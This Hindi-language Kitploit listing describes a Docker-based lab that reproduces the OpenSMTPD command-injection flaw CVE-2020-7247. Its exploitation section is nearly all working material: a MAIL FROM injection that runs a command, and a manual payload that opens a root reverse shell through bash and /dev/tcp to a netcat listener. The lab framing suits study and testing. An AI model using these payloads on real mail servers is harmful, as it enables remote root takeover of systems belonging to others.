Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/minhluannguyen/cve-2020-7247-reproducer
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubminhluannguyen/cve-2020-7247-reproducer

CVE-2020-7247-reproducer

Docker-आधारित वातावरण CVE-2020-7247 (OpenSMTPD) को पुनरुत्पादित करने के लिए, जिसमें Python exploit स्क्रिप्ट शामिल है जो crafted SMTP MAIL FROM फ़ील्ड के माध्यम से arbitrary command execution और reverse shell की अनुमति देती है।

रिपॉजिटरी देखें
131 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2020-7247 (OpenSMTPD)

जानकारी

इस रिपॉजिटरी में एक Docker इमेज बनाने के लिए आवश्यक फ़ाइलें शामिल हैं, जिसमें OpenSMTPD (6.6.1p1) का एक असुरक्षित वातावरण है। यह भेद्यता एक हमलावर को विशेष रूप से तैयार किए गए SMTP सत्र के माध्यम से, विशेष रूप से MAIL FROM फ़ील्ड में, मनमाने कमांड निष्पादित करने की अनुमति देती है।

उपयोग

  1. Docker इमेज बनाएँ (Debian-आधारित):
root@kitploit:~
docker build -t opensmtpd-vuln -f Dockerfile .
docker run -it --rm --name opensmtpd-vuln-test opensmtpd-vuln /bin/bash
smtpd -dv
  1. Nix इमेज बनाएँ:
root@kitploit:~
nix-build opensmtpd-vuln.nix
docker load < result
docker run -it --rm opensmtpd-vuln-nix /bin/bash
smtpd -dv

शोषण

  1. भेद्यता का शोषण करें:

3.1. मनमाने कमांड निष्पादित करें:

root@kitploit:~
$nc 172.17.0.2 25 220 debian ESMTP OpenSMTPD HELO toto 250 debian Hello toto [172.17.0.1], pleased to meet you MAIL FROM:<;touch secret.txt;> 250 2.0.0 Ok RCPT TO:<[email protected]> 250 2.1.5 Destination address valid: Recipient ok data 354 Enter mail, end with "." on a line by itself Hello Bonjour Xin chào . 250 2.0.0 09cb8342 Message accepted for delivery QUIT 221 2.0.0 Bye

3.2. रिवर्स शेल प्राप्त करें:

लिसनर सेट करें:

root@kitploit:~
nc -lnvp 8080

exploit.py स्क्रिप्ट चलाएँ (दूसरे टर्मिनल पर):

root@kitploit:~
python3 exploit.py

या मैन्युअली करें:

root@kitploit:~
$nc 172.17.0.2 25
220 debian ESMTP OpenSMTPD
HELO toto  
250 debian Hello toto [172.17.0.1], pleased to meet you
MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>
250 2.0.0 Ok
RCPT TO:<[email protected]>
250 2.1.5 Destination address valid: Recipient ok
data
354 Enter mail, end with "." on a line by itself

#0
#1
#2
#3
#4
#5
#6
#7
#8
#9
#a
#b
#c
#d
sh -c 'echo "bash -i >& /dev/tcp/172.17.0.1/8080 0>&1" | bash'
.
250 2.0.0 09cb8342 Message accepted for delivery
QUIT
221 2.0.0 Bye

अब आपके पास होस्ट मशीन पर रूट के रूप में एक शेल होना चाहिए।

संदर्भ

  • OpenSMTPD
  • NVD
टूल डाउनलोड करें